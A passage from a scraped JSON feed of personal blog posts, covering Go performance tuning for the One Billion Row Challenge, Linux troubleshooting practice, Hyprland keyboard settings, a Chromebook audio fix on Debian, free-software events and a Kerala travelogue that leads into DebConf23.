stats.Mean) \u002F float64(stats.Count)\n\t\t\tstationStats[station] = stats\n\t\t}\n\t}\nResults#\nThe time has further decreased from 5.3s to 4.8s with these changes.\ngo run main.go  15.69s user 0.44s system 332% cpu 4.853 total\nIteration 4: Read file in chunks#\nIn this version, the file is read in chunks, and each chunk is processed to ensure it contains complete lines. The processChunk function is used to separate valid data from leftover data in each chunk. Chunk size can be controlled with command line args as well.\nfunc main() {\n\t\u002F\u002F ....\n\tconst chunkSize = 256 * 1024 \u002F\u002F 256 KB\n\tbuf := make([]byte, chunkSize)\n\tleftover := make([]byte, 0, chunkSize)\n\n\tgo func() {\n\t\tfor {\n\t\t\tbytesRead, err := file.Read(buf)\n\t\t\tif bytesRead > 0 {\n\t\t\t\t\u002F\u002F Copy the chunk to a new slice, because the\n\t\t\t\t\u002F\u002F buffer will be reused in the next iteration.\n\t\t\t\tchunk := make([]byte, bytesRead)\n\t\t\t\tcopy(chunk, buf[:bytesRead])\n\t\t\t\t\u002F\u002F Process the chunk. The returned leftover will be processed in the next iteration.\n\t\t\t\tvalidChunk, newLeftover := processChunk(chunk, leftover)\n\t\t\t\tleftover = newLeftover\n\t\t\t\t\u002F\u002F Send the valid chunk to the processing goroutine.\n\t\t\t\tif len(validChunk) > 0 {\n\t\t\t\t\twg.Add(1)\n\t\t\t\t\tgo processChunkData(validChunk, resultsChan, &wg)\n\t\t\t\t}\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\twg.Wait()\n\t\tclose(resultsChan)\n\t}()\n\t\u002F\u002F ...\n}\n\n\nfunc processChunk(chunk, leftover []byte) (validChunk, newLeftover []byte) {\n\tfirstNewline := -1\n\tlastNewline := -1\n\t\u002F\u002F Find the first and last newline in the chunk.\n\tfor i, b := range chunk {\n\t\tif b == '\\n' {\n\t\t\tif firstNewline == -1 {\n\t\t\t\tfirstNewline = i\n\t\t\t}\n\t\t\tlastNewline = i\n\t\t}\n\t}\n\tif firstNewline != -1 {\n\t\tvalidChunk = append(leftover, chunk[:lastNewline+1]...)\n\t\tnewLeftover = make([]byte, len(chunk[lastNewline+1:]))\n\t\tcopy(newLeftover, chunk[lastNewline+1:])\n\t} else {\n\t\tnewLeftover = append(leftover, chunk...)\n\t}\n\treturn validChunk, newLeftover\n}\n\nfunc processChunkData(chunk []byte, resultsChan chan\u003C- map[string]Stats, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\n\tstationStats := make(map[string]Stats)\n\tscanner := bufio.NewScanner(strings.NewReader(string(chunk)))\n\n\tfor scanner.Scan() {\n\t\tline := scanner.Text()\n\n\t\t\u002F\u002F Find the index of the delimiter\n\t\tdelimiterIndex := strings.Index(line, \";\")\n\t\tif delimiterIndex == -1 {\n\t\t\tcontinue \u002F\u002F Delimiter not found, skip this line\n\t\t}\n\n\t\t\u002F\u002F Extract the station name and temperature string\n\t\tstation := line[:delimiterIndex]\n\t\ttempStr := line[delimiterIndex+1:]\n\n\t\t\u002F\u002F Convert the temperature string to a float\n\t\ttemp, err := strconv.ParseFloat(tempStr, 64)\n\t\tif err != nil {\n\t\t\tcontinue \u002F\u002F Invalid temperature value, skip this line\n\t\t}\n\n\t\t\u002F\u002F Update the statistics for the station\n\t\tstats, exists := stationStats[station]\n\t\tif !exists {\n\t\t\tstats = Stats{Min: temp, Max: temp}\n\t\t}\n\t\tstats.Count++\n\t\tstats.Min = min(stats.Min, temp)\n\t\tstats.Max = max(stats.Max, temp)\n\t\tstats.Mean += (temp - stats.Mean) \u002F float64(stats.Count)\n\t\tstationStats[station] = stats\n\t}\n\n\t\u002F\u002F Send the computed stats to resultsChan\n\tresultsChan \u003C- stationStats\n}\nIn addition to this, I moved the aggregateStats to a separate Goroutine as well:\n\taggWg.Add(1)\n\tfinalResults := make(map[string]Stats)\n\n\t\u002F\u002F Start a separate goroutine for aggregation\n\tgo func() {\n\t\tdefer aggWg.Done()\n\t\tfor workerResult := range resultsChan {\n\t\t\tfor station, stats := range workerResult {\n\t\t\t\tfinalStats, exists := finalResults[station]\n\t\t\t\tif !exists {\n\t\t\t\t\tfinalResults[station] = stats\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tfinalStats.Min = min(finalStats.Min, stats.Min)\n\t\t\t\tfinalStats.Max = max(finalStats.Max, stats.Max)\n\t\t\t\ttotalCount := finalStats.Count + stats.Count\n\t\t\t\tfinalStats.Mean = (finalStats.Mean*float64(finalStats.Count) + stats.Mean*float64(stats.Count)) \u002F float64(totalCount)\n\t\t\t\tfinalStats.Count = totalCount\n\t\t\t\tfinalResults[station] = finalStats\n\t\t\t}\n\t\t}\n\t}()\nResults#\nWe’re down from 4.8s to just 2.1s to read\u002Fparse\u002Fprocess 100mn lines!\n.\u002Fbin\u002F1brc.bin --file=input.txt --chunksize=1048576  17.58s user 0.77s system 837% cpu 2.190 total\nSummary#\nBasic File Reading and Parsing (Baseline):\nTime: 19s (baseline).\nKey Change: Sequentially reading and processing each line.\nSpeedup: N\u002FA (baseline).\nProducer-Consumer Pattern:\nTime: 54.225s.\nKey Change: Implemented concurrent line processing with producer-consumer pattern.\nSpeedup: -185% (slower than baseline).\nBatch Processing of Lines:\nTime: 6.442s.\nKey Change: Batched lines before processing, reducing channel communication.\nSpeedup: +66% (compared to baseline).\nReducing Memory Allocations - Iteration 1:\nTime: 5.346s.\nKey Change: Reused batch slices and reduced memory allocations.\nSpeedup: +72% (compared to baseline).\nReducing Memory Allocations - Iteration 2 (Avoiding strings.Split):\nTime: 4.853s.\nKey Change: Replaced strings.Split with manual slicing for efficiency.\nSpeedup: +75% (compared to baseline).\nRead File in Chunks:\nTime: 2.190s.\nKey Change: Processed file in chunks and optimized aggregation.\nSpeedup: +87% (compared to baseline).\nFinal Run#\nI’m quite satisfied with the final version for now. We can now proceed to test it with 1 billion lines. However it’s evidently CPU-bound, as we spawn N workers for N CPUs.\nI experimented with different chunk sizes, and here are the results from each run:\n\nChunk SizeTime\n\n512.00 KB23.756s\n1.00 MB21.798s\n16.00 MB20.693s\n32.00 MB19.501s\n\nTweaking the chunk size doesn’t significantly impact performance, as processing larger chunks takes longer.\nTL;DR: On an average and with multiple runs it takes approx 20s with the final iteration for 1bn lines.\nCheckout the full code on my GitHub.\nPotential Improvements#\nThis project was not only fun but also a great opportunity to revisit and refine many Go concepts. There are several ideas to contemplate for further improving this version’s timings:\nI haven’t yet considered using mmap, but I believe it could substantially speed things up.\nTo delve even deeper, custom line parsing functions, especially for converting string to float64, could offer improvements.\nEmploying custom hashing functions (perhaps FnV) might aid in faster map lookups.\nFin!",[],{"slug":1080,"title":1081,"link":1082,"pubDate":1083,"contentSnippet":1084,"tags":1085,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"sad-servers","Making sad servers happy","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsad-servers\u002F","2023-11-06T00:00:00.000Z","Introduction to SadServers#\nRecently, I stumbled upon sadservers, a platform described as “Like LeetCode for Linux”. The premise is: you are given access to a full remote Linux server with a pre-configured problem. Your mission is to diagnose and fix the issues in a fixed time window.\nWith the goal of documenting my journey through these challenges and sharing the knowledge gained, I decided to not only tackle these puzzles but also to record my solutions in a video format. The format is twofold in its purpose: it allows me to reflect on my problem-solving approach and provides a resource for others who may encounter similar problems, whether in real-world scenarios or in preparation for an SRE\u002FDevOps interview.\nThe Learning Curve#\nEach server presented a different issue, from misconfigured network settings to services failing to start, from permission issues to resource overutilization. One server, for instance, had a failing database service because of a disk full partition. The cause? Stale backup files. Another had a web server throwing errors because of incorrect file permissions.\nRecording the Solutions#\nThe video recordings start with an introduction to the problem and my initial thoughts. Viewers can see my screen as I work through the issue, making the troubleshooting process transparent and educational. The commentary explains my thought process, the tools\u002FCLI utilities used, and the solutions applied.\nPart 1#\n\nPart 2#\n\nPart 3#\n\nConclusion#\nFor those looking to enhance their Linux troubleshooting skills, sadservers.com is a gold mine. It’s an excellent preparation ground for anyone aiming to step into the SRE\u002FDevOps field or wanting to keep their skills sharp.\nAs I continue to record and share these troubleshooting escapades, I invite you to subscribe, comment with your insights, or even suggest what types of challenges you’d like to see addressed next.",[],{"slug":1087,"title":1088,"link":1089,"pubDate":1090,"contentSnippet":1091,"tags":1092,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"05-rupee-sign-on-hyprland-html","Enabling AltGr+4 for rupee\u002Feuro on Hyprland","https:\u002F\u002Faryak.me\u002Fblog\u002F05-rupee-sign-on-hyprland.html","Fri, 03 Nov 2023 12:39:45 +0000","Enabling the rupee sign (or the euro sign for that matter) on\nHyprland is pretty simple, but not well documented from my\n“research”.\nTo begin with, you need to use the altgr-intl layout in order to be\nable to use it in the first place. This also gives you access to many\nother characters as well.\nTo do this, add kb_variant = altgr-intl in the input\nsection of your hyprland.conf.\nPast this, the configuration is pretty simple, you just have to add\nthe required options to kb_options.\nYou can get a list of these with\nlocalectl list-x11-keymap-options.\nIn my case, I needed rupeesign:4\nAt the end, this is how the hyprland.conf’s input section looks:\ninput {\n    kb_layout = us\n    kb_options = rupeesign:4, caps:backspace\n    kb_variant = altgr-intl\n    [...mouse stuff...]\n}",[1093],"2023\u002F11\u002F03\u002F5",{"slug":1095,"title":1096,"link":1097,"pubDate":1098,"contentSnippet":1099,"tags":1100,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"software-freedom-day-at-sflc-in","Software Freedom Day at sflc.in","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsoftware-freedom-day-at-sflc.in\u002F","Mon, 23 Oct 2023 03:25:34 +0530","Software Freedom Law Center, India, also known as sflc.in, organized an event to celebrate the Software Freedom Day on 30th September 2023. I, Sahil, Contrapunctus and Suresh joined. The venue was at the SFLC India office in Delhi. The sflc.in office was on the second floor of what looked like someone’s apartment:). I also met Chirag, Orendra, Surbhi and others.\nMy plan was to have a stall on LibreOffice and Prav app to raise awareness about these projects. I didn’t have QR code for downloading prav app printed already, so I asked the people at sflc.in if they can get it printed for me. They were very kind and helped me in getting a color printout for me. So, I got a stall in their main room. Surbhi was having an Inkscape stall next to mine and gave me company.  People came and asked about the prav project and then I realized I was still too tired to explain the idea behind the prav project and about LibreOffice (after a long Kerala trip). We got a few prav app installs during the event, which is cool.\n\n      \nMy stall. Photo credits: Tejaswini.\nSahil had a Debian stall, and contrapunctus had an OpenStreetMap stall. After about an hour, Revolution OS was screened for all of us to watch, along with popcorn. The documentary gave an overview of history of Free Software Movement. The office had a kitchen where fresh chai was being made and served to us. The organizers ordered a lot of good snacks for us.\n\n      \nSnacks and tea at the front desk. CC-BY-SA 4.0 by Ravi Dwivedi.\nI came out of the movie hall to take more tea and snacks from the front desk. I saw a beautiful painting was hanging at the wall opposite to the front desk and Tejaswini (from sflc.in) revealed that she had made it. The tea was really good as it was freshly made in the kitchen.\nAfter the movie, we played a game of pictionary. We were divided into two teams. The game goes as follows: A person from a team is selected and given a term related to freedom respecting software written on a piece of paper, but concealed from other participants. Then that person draws something on the board (no logo, no alphabets) without speaking. If the person’s team correctly guesses the term, the team gets one step ahead on the leaderboard. The team that reaches the finish line wins.\nI recall some fun Pictionary rounds. For example, the one in the picture below seemed far from the word “Wireguard,” but someone from the team still guessed that word. Our team won in the end \\o\u002F.\n\n      \nPictionary drawing nowhere close to the intended word Wireguard :), which was guessed. Photo by Ravi Dwivedi, CC-BY-SA 4.0.\nThen, we posed for a group picture. At the end, SFLC.in had a delicious cake in store for us. They also had some merchandise available, such as handbags, T-shirts, etc., which we could take if we made a donation to SFLC.in. I “bought” a handbag with “Ban Plastic, not Internet” written on it in exchange for a donation. I hope that gives people around me a powerful message :)\n\n      \nGroup photo. Photo credits: Tejaswini.\n\n      \nTasty cake. CC-BY-SA 4.0 by Ravi Dwivedi.\n\n      \nMerchandise by sflc.in. CC-BY-SA 4.0 by Ravi Dwivedi.\nOverall, sflc.in hosted a fantastic event!",[],{"slug":1102,"title":1103,"link":1104,"pubDate":1105,"contentSnippet":1106,"tags":1107,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-14","Riff: A \"mycelium-clj\" for the Clojure ecosystem?","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fmycelium-clj\u002Findex.html","Thu, 19 Oct 2023 00:00:00 +0000","In a world of concrete objects, steel frameworks bring sense and order. In a forest of composable tools, libraries and open-ended schemas, it would be the mycelia. A frustrated yet optimistic man muses \"Might such a thing come to be?\".",[49,52,723,530,1108],"recurse_center",{"slug":1110,"title":1111,"link":1112,"pubDate":1113,"contentSnippet":1114,"tags":1115,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kochi-wayanad-trip-aug-sep-2023","Kochi - Wayanad Trip in August-September 2023","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkochi-wayanad-trip-aug-sep-2023\u002F","Sat, 14 Oct 2023 17:48:54 +0530","A trip full of hitchhiking, beautiful places and welcoming locals.\nDay 1: Arrival in Kochi\nKochi is a city in the state of Kerala, India. This year’s DebConf was to be held in Kochi from 3rd September to 17th of September, which I was planning to attend. My friend Suresh, who was planning to join, told me that 29th August 2023 will be Onam, a major festival of the state of Kerala. So, we planned a Kerala trip before the DebConf. We booked early morning flights for Kochi from Delhi and reached Kochi on 28th August.\nWe had booked a hostel named Zostel in Ernakulam. During check-in, they asked me to fill a form which required signing in using a Google account. I told them I don’t have a Google account and I don’t want to create one either. The people at the front desk seemed receptive, so I went ahead with telling them the problems of such a sign-in being mandatory for check-in. Anyways, they only took a photo of my passport and let me check-in without a Google account.\nWe stayed in a ten room dormitory, which allowed travellers of any gender. The dormitory room was air-conditioned, spacious, clean and beds were also comfortable. There were two bathrooms in the dormitory and they were clean. Plus, there was a separate dormitory room in the hostel exclusive for females. I noticed that that Zostel was not added in the OpenStreetMap and so, I added it :) . The hostel had a small canteen for tea and snacks, a common sitting area outside the dormitories, which had beds too. There was a separate silent room, suitable for people who want to work.\n\n      \nDormitory room in Zostel Ernakulam, Kochi.\n\n      \nBeds in Zostel Ernakulam, Kochi.\nWe had lunch at a nearby restaurant and it was hard to find anything vegetarian for me. I bought some freshly made banana chips from the street and they were tasty. As far as I remember, I had a big glass of pineapple juice for lunch. Then I went to the Broadway market and bought some cardamom and cinnamon for home. I also went to a nearby supermarket and bought Matta brown rice for home. Then, I looked for a courier shop to send the things home but all of them were closed due to Onam festival. After returning to the Zostel, I overslept till 9 PM and in the meanwhile, Suresh planned with Saidut and Shwetank (who met us during our stay in Zostel) to go to a place in Fort Kochi for dinner. I suspected I will be disappointed by lack of vegetarian options as they were planning to have fish. I already had a restaurant in mind - Brindhavan restaurant (suggested by Anupa), which was a pure vegetarian restaurant.\nTo reach there, I got off at Palarivattom metro station and started looking for an auto-rickshaw to get to the restaurant. I didn’t get any for more than 5 minutes. Since that restaurant was not added to the OpenStreetMap, I didn’t even know how far that was and which direction to go to. Then, I saw a Zomato delivery person on a motorcycle and asked him where the restaurant was. It was already 10 PM and the restaurant closes at 10:30. So, I asked him whether he can drop me off. He agreed and dropped me off at that restaurant. It was 4-5 km from that metro station. I tipped him and expressed my gratefulness for the help. He refused to take the tip, but I insisted and he accepted.\nI entered the restaurant and it was coming to a close, so many items were not available. I ordered some Kadhai Paneer (only item left) with naan. It tasted fine. Since the next day was Thiruvonam, I asked the restaurant about the Sadya thali menu and prices for the next day. I planned to eat Sadya thali at that restaurant, but my plans got changed later.\n\n      \nOnam sadya menu from Brindhavan restaurant.\nDay 2: Onam celebrations\nNext day, on 29th of August 2023, we had plan to leave for Wayanad. Wayanad is a hill station in Kerala and a famous tourist spot. Praveen suggested to visit Munnar as it is far closer to Kochi than Wayanad (80 km vs 250 km). But I had already visited Munnar in my previous trips, so we chose Wayanad. We had a train late night from Ernakulam Junction (at 23:30 hours) to Kozhikode, which is the nearest railway station from Wayanad. So, we checked out in the morning as we had plans to roam around in Kochi before taking the train.\nZostel was celebrating Onam on that day. To opt-in, we had to pay 400 rupees, which included a Sadya Thali and a Mundu. Me and Suresh paid the amount and opted in for the celebrations. Sadya thali had Rice, Sambhar, Rasam, Avial, Banana Chips, Pineapple Pachadi, Pappadam, many types of pickels and chutneys, Pal Ada Payasam and Coconut jaggery Pasam. And, there was water too :). Those payasams were really great and I had one more round of them. Later, I had a lot of variety of payasams during the DebConf.\n\n      \nSadya lined up for serving\n\n      \nSadya thali served on banana leaf.\nIn the evening, we hung out in the common room and put our luggage there. We played UNO and had conversations with other travellers in the hostel. I had a fun time there and I still think it is one of the best hostel experiences I had. We made good friends with Saiduth (Telangana) and Shwetank (Uttarakhand). They were already aware about the software like debian, and we had some detailed conversations about the Free Software movement. I remember explaining the difference between the terms “Open Source” and “Free Software”. I also told them about the Streetcomplete app, a beginner friendly app to edit OpenStreetMap. We had dinner at a place nearby (named Palaraam), but again, the vegetarian options were very limited! After dinner, we came back to the Zostel and me and Suresh left for Ernakulam Junction to catch our train Maveli Express (16604).\nDay 3: Going to Wayanad\nMaveli Express was scheduled to reach Kozhikode at 03:25 (morning). I had set alarms from 03:00 to 03:30, with the gap of 10 minutes. Every time I woke up, I turned off the alarm. Then I woke up and saw train reaching the Kozhikode station and woke up Suresh for deboarding. But then I noticed that the train is actually leaving the station, not arriving! This means we missed our stop. Now we looked at the next stops and whether we can deboard there. I was very sleepy and wanted to take a retiring room at some station before continuing our journey to Wayanad. The next stop was Quilandi and we checked online that it didn’t have a retiring room. So, we skipped this stop. We got off at the next stop named Vadakara and found out no retiring room was available. So, we asked about information regarding bus for Wayanad and they said that there is a bus to Wayanad around 07:00 hours from bus station which was a few kilometres from the railway station.\nWe took a bus for Kalpetta (in Wayanad) at around 07:00. The destination of the buses were written in Malayalam, which we could not read. Once again, the locals helped us to get on to the bus to Kalpetta. Vadakara is not a big city and it can be hard to find people who know good Hindi or English, unlike Kochi. Despite language issues, I had no problem there in navigation, thanks to locals. I mostly spent time sleeping during the bus journey.\nA few hours later, the bus dropped us at Kalpetta. We had a booking at a hostel in Rippon village. It was 16 km from Kalpetta. On the way, we were treated with beautiful views of nature, which was present everywhere in Wayanad. The place was covered with tea gardens and our eyes were treated with beautiful scenery at every corner.\n\n      \nWe were treated with such views during the Wayanad trip.\nRippon village was a very quiet place and I liked the calm atmosphere. This place is blessed by nature and has stunning scenery. I found English was more common than Hindi in Wayanad. Locals were very nice and helpful, even if they didn’t know my language.\n\n      \nA road in Rippon.\nAfter catching some sleep at the hostel, I went out in the afternoon. I hitchhiked to reach the main road from the hostel. I bought more spices from a nearby shop and realized that I should have waited for my visit to Wayanad to buy cardamom, which I already bought from Kochi. Then, I was looking for post office to send spices home. The people at the spices shop told me that the nearby Rippon post office was closed by that time, but the post office at Meppadi was open, which was 5 km from there.\nI went to Meppadi and saw the post office closes at 15:00, but I reached five minutes late. My packing was not very good and they asked me to pack it tighter. There was a shop near the post office and the people there gave me a cardboard and tapes, and helped pack my stuff for the post. By the time I went to the post office again, it was 15:30. But they accepted my parcel for post.\nDay 4: Kanthanpara Falls, Zostel Wayanad and Karapuzha Dam\nKanthanpara waterfalls were 2 km from the hostel. I hitchhiked to the place from the hostel on a scooty. Entry ticket was worth Rs 40. There were good views inside and nothing much to see except the waterfalls.\n\n      \nEntry to Kanthanpara Falls.\n\n      \nKanthanpara Falls.\nWe had a booking at Zostel Wayanad for this day and so we shifted there. Again, as with their Ernakulam branch, they asked me to fill a form which required signing in using Google, but when I said I don’t have a Google account they checked me in without that. There were tea gardens inside the Zostel boundaries and the property was beautiful.\n\n      \nA view of Zostel Wayanad.\n\n      \nA map of Wayanad showing tourist places.\n\n      \nA view from inside the Zostel Wayanad property.\nLater in the evening, I went to Karapuzha Dam. I witnessed a beautiful sunset during the journey. Karapuzha dam had many activites, like ziplining, and was nice to roam around.\nChembra Peak is near to the Zostel Wayanad. So, I was planning to trek to the heart shaped lake. It was suggested by Praveen and looking online, this trek seemed worth doing. There was an issue however. The charges for trek were Rs 1770 for upto five people. So, if I go alone I will have to spend Rs 1770 for the trek. If I go with another person, we split Rs 1770 into two, and so on. The optimal way to do it is to go in a group of five (you included :D). I asked front desk at Zostel if they can connect me with people going to Chembra peak the next day, and they told me about a group of four people planning to go to Chembra peak the next day. I got lucky! All four of them were from Kerala and worked in Qatar.\nDay 5: Chembra peak trek\nThe date was 1st September 2023. I woke up early (05:30 in the morning) for the Chembra peak trek. I had bought hiking shoes especially for trekking, which turned out to be a very good idea. The ticket counter opens at 07:00. The group of four with which I planned to trek met me around 06:00 in the Zostel. We went to the ticket counter around 06:30. We had breakfast at shops selling Maggi noodles and bread omlette near the ticket counter.\nIt was a hot day and the trek was difficult for an inexperienced person like me. The scenery was green and beautiful throughout.\nThe day was scorching hot, and the trek proved to be challenging for someone like me, who was relatively inexperienced. However, the lush green scenery surrounding us was incredibly beautiful throughout the journey.\n\n      \nTerrain during trekking towards the Chembra peak.\n\n      \nHeart-shaped lake at the Chembra peak.\n\n      \nMe at the heart-shaped lake.\n\n      \nViews from the top of the Chembra peak.\n\n      \nView of another peak from the heart-shaped lake.\nOn the way back from the trek, I stumbled upon a shop selling bamboo rice, which I purchased with the intention of making bamboo rice payasam at home (I even have some coconut milk from Kerala to use ;)). We arrived back at Zostel in the afternoon. I experienced muscle soreness after the trek, and it has yet to completely subside. Later that night, we boarded a bus from Kalpetta to Kozhikode to begin our journey back to Kochi.\nDay 6: Return to Kochi\nAt midnight on the 2nd of September, we arrived at Kozhikode bus stand. Afterward, we wandered around in search of something to eat, but unfortunately, I couldn’t find any vegetarian options. Not a surprising turn of events, considering Kozhikode is especially famous for its non-vegetarian dishes. We then headed to Kozhikode railway station to inquire about retiring rooms, but we were out of luck. We waited at the station and caught the next train to Kochi at 03:30, arriving at Ernakulam Junction at 07:30, half an hour before the scheduled arrival time of the train. From there, we made our way to Zostel Fort Kochi, where we spent the night before checking out the next morning.\nDay 7: Roaming around in Fort Kochi\nOn the 3rd of September, we explored Fort Kochi, visiting popular landmarks such as St. Francis Church, Dutch Palace, Jew Town, and the Pardesi Synagogue. During our visit, I also had the opportunity to tour some homestays, where the owners graciously showed me around their properties, despite my clear indication that I was not seeking accommodation. In the evening, we made our way to Kakkanad to participate in DebConf.\nFor more details on my experiences at DebConf23, you can continue reading in my DebConf23 blog post.",[],{"slug":1117,"title":1118,"link":1119,"pubDate":1120,"contentSnippet":1121,"tags":1122,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fixing-audio-and-keymap-in-chromebook-running-debian","Fixing audio and keymaps in Chromebook Running Debian Bookworm","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffixing-audio-and-keymap-in-chromebook-running-debian\u002F","Tue, 26 Sep 2023 13:07:22 +0530","I recently bought an HP Chromebook from Abhas who had already flashed coreboot in it. I ran a fresh installation of Debian 12 (Bookworm) on it with KDE Plasma.\nRight after installation, the Wi-Fi and bluetooth were working, but I was facing two issues:\nPlaying a music file or any audio file does not give any audio.\nKeyboard buttons like the ones for brightness and audio adjustment were not working (alphabet keys were working).\nFixing audio\nI ran the script mentioned here and that fixed the audio.\nThe instructions from that link are:\ngit clone https:\u002F\u002Fgithub.com\u002FWeirdTreeThing\u002Fchromebook-linux-audio\ncd chromebook-linux-audio\n.\u002Fsetup-audio\n\nFixing keyboard\nTo fix the keyboard, go to KDE Settings and in the Hardware section, under the “Keyboard model” box select the option Google | Chromebook as depicted in the screenshot below.\n\n      \nScreenshot depicting keyboard layout settings of KDE.\nI hope this post fixed the issues for you. Meet you in the next post.",[],{"slug":1124,"title":1125,"link":1126,"pubDate":1127,"contentSnippet":1128,"tags":1129,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"debconf23","Debconf23","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fdebconf23\u002F","Fri, 22 Sep 2023 23:49:38 +0530","Official logo of DebConf23\nIntroduction\nDebConf23, the 24th annual Debian Conference, was held in India in the city of Kochi, Kerala from the 3rd to the 17th of September, 2023. Ever since I got to know about it (which was more than an year ago), I was excited to attend DebConf in my home country. This was my second DebConf, as I attended one last year in Kosovo. I was very happy that I didn’t need to apply for a visa to attend. I got full bursary to attend the event (thanks a lot to Debian for that!) which is always helpful in covering the expenses, especially if the venue is a five star hotel :)\nFor the conference, I submitted two talks. One was suggested by Sahil on Debian packaging for beginners, while the other was suggested by Praveen who opined that a talk covering broader topics about “freedom” in self-hosting services will be better, when I started discussing about submitting a talk about prav app project. So I submitted one on Debian packaging for beginners and the other on ideas on sustainable solutions for self-hosting.\nMy friend Suresh - who is enthusiastic about Debian and free software - wanted to attend the DebConf as well. When the registration started, I reminded him about applying. We landed in Kochi on the 28th of August 2023 during the festival of Onam. We celebrated Onam in Kochi, had a trip to Wayanad, and returned to Kochi. On the evening of the 3rd of September, we reached the venue - Four Points Hotel by Sheraton, at Infopark Kochi, Ernakulam, Kerala, India.\nHotel overview\nThe hotel had 14 floors, and featured a swimming pool and gym (these were included in our package). The hotel gave us elevator access for only our floor, along with public spaces like the reception, gym, swimming pool, and dining areas. The temperature inside the hotel was pretty cold and I had to buy a jacket to survive. Perhaps the hotel was in cahoots with winterwear companies? :)\nFour Points Hotel by Sheraton was the venue of DebConf23, photo by rmb\n\n\n\n\nPhoto of the pool. Photo credits: Andreas Tille.\n\n\n\n      \nView from the hotel window.\nMeals\nOn the first day, Suresh and I had dinner at the eatery on the third floor. At the entrance, a member of the hotel staff asked us about how many people we wanted a table for. I told her that it’s just the two of us at the moment, but (as we are attending a conference) we might be joined by others. Regardless, they gave us a table for just two. Within a few minutes, we were joined by Alper from Turkey and urbec from Germany. So we shifted to a larger table…but then we were joined by even more people, so we were busy adding more chairs to our table. urbec had already been in Kerala for the past 5-6 days and was, on one hand, very happy already with the quality and taste of bananas in Kerala…and on the other, rather afraid of the spicy food :)\nTwo days later, the lunch and dinner were shifted to the All Spice Restaurant on the 14th floor, but the breakfast was still served at the eatery. Since the eatery (on the 3rd floor) had greater variety of food than the other venue, this move made breakfast the best meal for me and many others. Many attendees from outside India were not accustomed to the “spicy” food. It is difficult for locals to help them, because what we consider mild can be spicy for others. It is not easy to satisfy everyone at the dining table, but I think the organizing team did a very good job in the food department. (That said, it didn’t matter for me after a point, and you will know why.) The pappadam were really good, and I liked the rice labelled “Kerala rice”. I actually brought that exact rice and pappadam home during my last trip to Kochi and everyone at my home liked it too (thanks to Abhijit PA). I also wished to eat all types of payasams from Kerala and this really happened (thanks to Sruthi who designed the menu). Every meal had a different variety of payasam and it was awesome, although I didn’t like some of them, mostly because they were very sweet. Meals were later shifted to the ground floor (taking away the best breakfast option which was the eatery).\nThis place served as lunch and dinner place and later as hacklab during debconf. Photo credits: Bilal\n\nThe excellent Swag Bag\nThe DebConf registration desk was at the second floor. We were given a very nice swag bag. They were available in multiple colors - grey, green, blue, red - and included an umbrella, a steel mug, a multiboot USB drive by Mostly Harmless, a thermal flask, a mug by Canonical, a paper coaster, and stickers. It rained almost every day in Kochi during our stay, so handing out an umbrella to every attendee was a good idea.\nPicture of the awesome swag bag given at DebConf23. Photo credits: Ravi Dwivedi\n\nA gift for Nattie\nDuring breakfast one day, Nattie (Belgium) expressed the desire to buy a coffee filter. The next time I went to the market, I bought a coffee filter for her as a gift. She seemed happy with the gift and was flattered to receive a gift from a young man :)\nBeing a mentor\nThere were many newbies who were eager to learn and contribute to Debian. So, I mentored whoever came to me and was interested in learning. I conducted a packaging workshop in the bootcamp, but could only cover how to set up the Debian Unstable environment, and had to leave out how to package (but I covered that in my talk). Carlos (Brazil) gave a keysigning session in the bootcamp. Praveen was also mentoring in the bootcamp. I helped people understand why we sign GPG keys and how to sign them. I planned to take a workshop on it but cancelled it later.\nMy talk\nMy Debian packaging talk was on the 10th of September, 2023. I had not prepared slides for my Debian packaging talk in advance - I thought that I could do it during the trip, but I didn’t get the time…so I prepared them on the day before the talk. Since it was mostly a tutorial, the slides did not need much preparation. My thanks to Suresh, who helped me with the slides and made it possible to complete them in such a short time frame.\nMy talk was well-received by the audience, going by their comments. I am glad that I could give an interesting presentation.\nMy presentation photo. Photo credits: Valessio\n\nVisiting a saree shop\nAfter my talk, Suresh, Alper, and I went with Anisa and Kristi - who are both from Albania, and have a never-ending fascination for Indian culture :) - to buy them sarees. We took autos to Kakkanad market and found a shop with a great variety of sarees. I was slightly familiar with the area around the hotel, as I had been there for a week. Indian women usually don’t try on sarees while buying - they just select the design. But Anisa wanted to put one on and take a few photos as well. The shop staff did not have a trial saree for this purpose, so they took a saree from a mannequin. It took about an hour for the lady at the shop to help Anisa put on that saree…but you could tell that she was in heaven wearing that saree, and she bought it immediately :) Alper also bought a saree to take back to Turkey for his mother. Me and Suresh wanted to buy a kurta which would go well with the mundu we already had, but we could not find anything to our liking.\nSelfie with Anisa and Kristi. Photo credits: Anisa.\n\nCheese and Wine Party\nOn the 11th of September we had the Cheese and Wine Party, a tradition of every DebConf. I brought Kaju Samosa and Nankhatai from home. Many attendees expressed their appreciation for the samosas. During the party, I was with Abhas and had a lot of fun. Abhas brought packets of paan and served them at the Cheese and Wine Party. We discussed interesting things and ate burgers. But due to the restrictive alcohol laws in the state, it was less fun compared to the previous DebConfs - you could only drink alcohol served by the hotel in public places. If you bought your own alcohol, you could only drink in private places (such as in your room, or a friend’s room), but not in public places.\nMe helping with the Cheese and Wine Party.\n\nParty at my room\nLast year, Joenio (Brazilian) brought pastis from France which I liked. He brought the same alocholic drink this year too. So I invited him to my room after the Cheese and Wine party to have pastis. My idea was to have them with my roommate Suresh and Joenio. But then we permitted Joenio to bring as many people as he wanted…and he ended up bringing some ten people. Suddenly, the room was crowded. I was having good time at 